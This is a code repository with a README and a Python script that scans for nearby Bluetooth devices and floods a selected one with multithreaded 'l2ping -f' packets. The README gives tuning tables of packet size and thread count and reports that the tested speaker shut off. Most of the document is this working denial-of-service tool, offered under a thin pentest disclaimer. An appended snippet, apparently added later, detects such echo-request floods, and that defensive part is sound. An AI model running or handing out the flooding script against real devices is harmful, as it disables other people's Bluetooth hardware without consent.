├── README.md
└── Bluetooth-DOS-Attack.py


/README.md:
--------------------------------------------------------------------------------
# Bluetooth DOS-Attack Script

![Python Version](https://img.shields.io/pypi/pyversions/Django.svg)

Script for conducting DOS-attacks on Bluetooth devices for pentest purposes.

## Disclaimer

This project was created for educational purposes and personal use only.

**DISCLAIMER:** This software is provided "as is" without any warranty. Usage is at your own risk. The developers assume no liability for any misuse or damage caused by this program.

## Installation

```shell
$ sudo apt update
$ sudo apt install python3
$ sudo git clone https://github.com/jieggiI/BLUETOOTH-DOS-ATTACK-SCRIPT.git
$ cd BLUETOOTH-DOS-ATTACK-SCRIPT/
$ python3 Bluetooth-DOS-Attack.py
```

## Note

This script is designed to work only on Linux systems. You must have the `l2ping` and `hcitool` utilities on your Linux machine (they are installed by default on Kali Linux).

## Tested on

Kali Linux as attacker, and Xiaomi Portable Bluetooth Speaker as target.

Raspberry Pi W Zero as attacker, and Redmi Buds Lite as target.

## Manual

Target ID or MAC: ID or MAC address displayed after scanning.

Package Size: Size of the packets to be sent to the target (600 is optimal).

Threads Count: Number of threads that simultaneously send packets to the target. Optimal value can be found in the provided table.

| Package size | Threads count | Ping, ms | Distance, meters | Time waited, sec | Device |
|:------------:|:-------------:|:--------:|:----------------:|:----------------:|:------:|
| 600 | 1 | 9 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 10 | 38 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 20 | 78 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 50 | 229 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 100 | 413 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 200 | 806 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 500 | 1961 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 1000 | 6621 | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |
| 600 | 1000+ | Couldn't calculate | 0.3 | 5 | Xiaomi Mi Portable Bluetooth Speaker |

## What Happens to the Target Device

While I can't speak for all devices, the device I tested typically just turned off.

--------------------------------------------------------------------------------
/Bluetooth-DOS-Attack.py:
--------------------------------------------------------------------------------
import os
import threading
import time
import subprocess


def DOS(target_addr, packages_size):
    # Each thread runs one l2ping flood (-f) with the chosen payload size (-s).
    os.system('l2ping -i hci0 -s ' + str(packages_size) +' -f ' + target_addr)


def printLogo():
    print(' Bluetooth DOS Script ')


def main():
    printLogo()
    time.sleep(0.1)
    print('')
    print('\x1b[31mTHIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.')
    if (input("Do you agree? (y/n) > ") in ['y', 'Y']):
        time.sleep(0.1)
        os.system('clear')
        printLogo()
        print('')
        print("Scanning ...")
        output = subprocess.check_output("hcitool scan", shell=True, stderr=subprocess.STDOUT, text=True)
        lines = output.splitlines()
        id = 0
        del lines[0]  # drop the header line printed by hcitool
        array = []
        print("|id | mac_addres | device_name|")
        for line in lines:
            info = line.split()
            mac = info[0]
            array.append(mac)
            # Join the name with spaces so multi-word device names stay readable.
            print(f"|{id} | {mac} | {' '.join(info[1:])}|")
            id = id + 1
        target_id = input('Target id or mac > ')
        try:
            target_addr = array[int(target_id)]
        except (ValueError, IndexError):
            # Not a listed id: treat the input as a MAC address.
            target_addr = target_id

        if len(target_addr) < 1:
            print('[!] ERROR: Target addr is missing')
            exit(0)

        try:
            packages_size = int(input('Packages size > '))
        except ValueError:
            print('[!] ERROR: Packages size must be an integer')
            exit(0)
        try:
            threads_count = int(input('Threads count > '))
        except ValueError:
            print('[!] ERROR: Threads count must be an integer')
            exit(0)
        print('')
        os.system('clear')

        print("\x1b[31m[*] Starting DOS attack in 3 seconds...")

        for i in range(0, 3):
            print('[*] ' + str(3 - i))
            time.sleep(1)
        os.system('clear')
        print('[*] Building threads...\n')

        for i in range(0, threads_count):
            print('[*] Built thread №' + str(i + 1))
            threading.Thread(target=DOS, args=[str(target_addr), str(packages_size)]).start()

        print('[*] Built all threads...')
        print('[*] Starting...')
    else:
        print('Bip bip')
        exit(0)


if __name__ == '__main__':
    try:
        os.system('clear')
        main()
    except KeyboardInterrupt:
        time.sleep(0.1)
        print('\n[*] Aborted')
        exit(0)
    except Exception as e:
        time.sleep(0.1)
        print('[!] ERROR: ' + str(e))

--------------------------------------------------------------------------------
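Seen from the receiving side, the `l2ping -f` traffic this repository generates is a burst of L2CAP Echo Requests from a single peer, so it can be spotted by rate. The following is an added detection example, not part of the repository: it flags such bursts in already-parsed capture records, and the record layout, the thresholds and the sample addresses are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

L2CAP_ECHO_REQUEST = 0x08  # L2CAP signaling code for Echo Request (what l2ping sends)


def find_echo_floods(events, window_ms=1000, max_requests=20):
    """Flag peers whose Echo Request rate exceeds max_requests per window.

    events: time-ordered (timestamp_ms, peer_addr, signaling_code, payload_len)
    records. This record layout and the default thresholds are assumptions of
    the example, not the output format of any particular capture tool.
    Returns {peer_addr: (peak_requests, peak_bytes)} for flagged peers only.
    """
    window = defaultdict(deque)      # peer -> (timestamp, length) still in window
    window_bytes = defaultdict(int)  # peer -> payload bytes still in window
    flagged = {}
    for ts, peer, code, length in events:
        if code != L2CAP_ECHO_REQUEST:
            continue                 # other signaling traffic is not counted
        q = window[peer]
        q.append((ts, length))
        window_bytes[peer] += length
        while ts - q[0][0] > window_ms:  # expire entries older than the window
            window_bytes[peer] -= q.popleft()[1]
        if len(q) > max_requests:
            peak_n, peak_b = flagged.get(peer, (0, 0))
            flagged[peer] = (max(peak_n, len(q)),
                             max(peak_b, window_bytes[peer]))
    return flagged


def constructed_sample():
    """Constructed records: one occasional pinger and one flooding peer."""
    benign, flooder = "AA:AA:AA:AA:AA:01", "AA:AA:AA:AA:AA:02"
    # One small Echo Request per second for five seconds.
    events = [(t * 1000, benign, L2CAP_ECHO_REQUEST, 44) for t in range(5)]
    events.append((5000, benign, 0x02, 0))  # a Connection Request, ignored
    # 200 Echo Requests of 600 bytes, 5 ms apart.
    events += [(10000 + i * 5, flooder, L2CAP_ECHO_REQUEST, 600)
               for i in range(200)]
    return events


if __name__ == "__main__":
    for peer, (n, b) in find_echo_floods(constructed_sample()).items():
        print(f"{peer}: {n} echo requests / {b} bytes within 1 s")
```

The thresholds should be tuned against normal traffic on the monitored host before alerting on them.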